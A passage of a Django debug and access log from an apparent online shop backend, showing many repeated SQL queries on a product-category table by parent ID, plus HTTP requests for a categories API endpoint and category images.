"shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:26:06,160 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:26:06,162 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:26:06,165 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:26:06,167 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:26:06,169 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:26:06,172 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:26:06,174 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:26:06,176 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:26:06,179 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:26:06,181 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:26:06,183 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:26:06,186 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:26:06,189 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:26:06,191 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:26:06,193 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:26:06,196 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:26:06,198 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:26:06,200 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:26:06,203 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:26:06] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:26:06] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 304 0 [13/Dec/2019 13:29:05] "GET / HTTP/1.0" 302 0 [13/Dec/2019 13:30:01] "GET /whm-server-status HTTP/1.0" 301 0 DEBUG 2019-12-13 13:30:53,139 utils 11259 139831552767744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 13:30:53,149 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 13:30:53,152 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 13:30:53,154 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 13:30:53,157 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 13:30:53,160 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 13:30:53,164 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 13:30:53,168 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 13:30:53,172 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 13:30:53,175 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 13:30:53,178 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 13:30:53,183 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 13:30:53,188 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 13:30:53,193 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 13:30:53,198 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 13:30:53,203 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 13:30:53,207 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 13:30:53,210 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 13:30:53,213 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 13:30:53,217 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 13:30:53,221 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 13:30:53,224 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 13:30:53,226 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 13:30:53,229 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 13:30:53,232 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 13:30:53,237 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 13:30:53,241 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 13:30:53,245 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 13:30:53,249 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 13:30:53,254 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 13:30:53,260 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 13:30:53,265 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 13:30:53,269 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 13:30:53,273 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 13:30:53,277 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 13:30:53,282 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 13:30:53,285 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 13:30:53,289 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 13:30:53,294 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 13:30:53,297 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 13:30:53,300 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 13:30:53,303 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 13:30:53,306 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 13:30:53,308 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 13:30:53,311 utils 11259 139831552767744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 13:30:53,313 utils 11259 139831552767744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 13:30:53] "GET /api/v1/categories/ HTTP/1.0" 200 8596 [13/Dec/2019 13:30:53] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [13/Dec/2019 13:30:53] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-13 13:31:02,204 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", 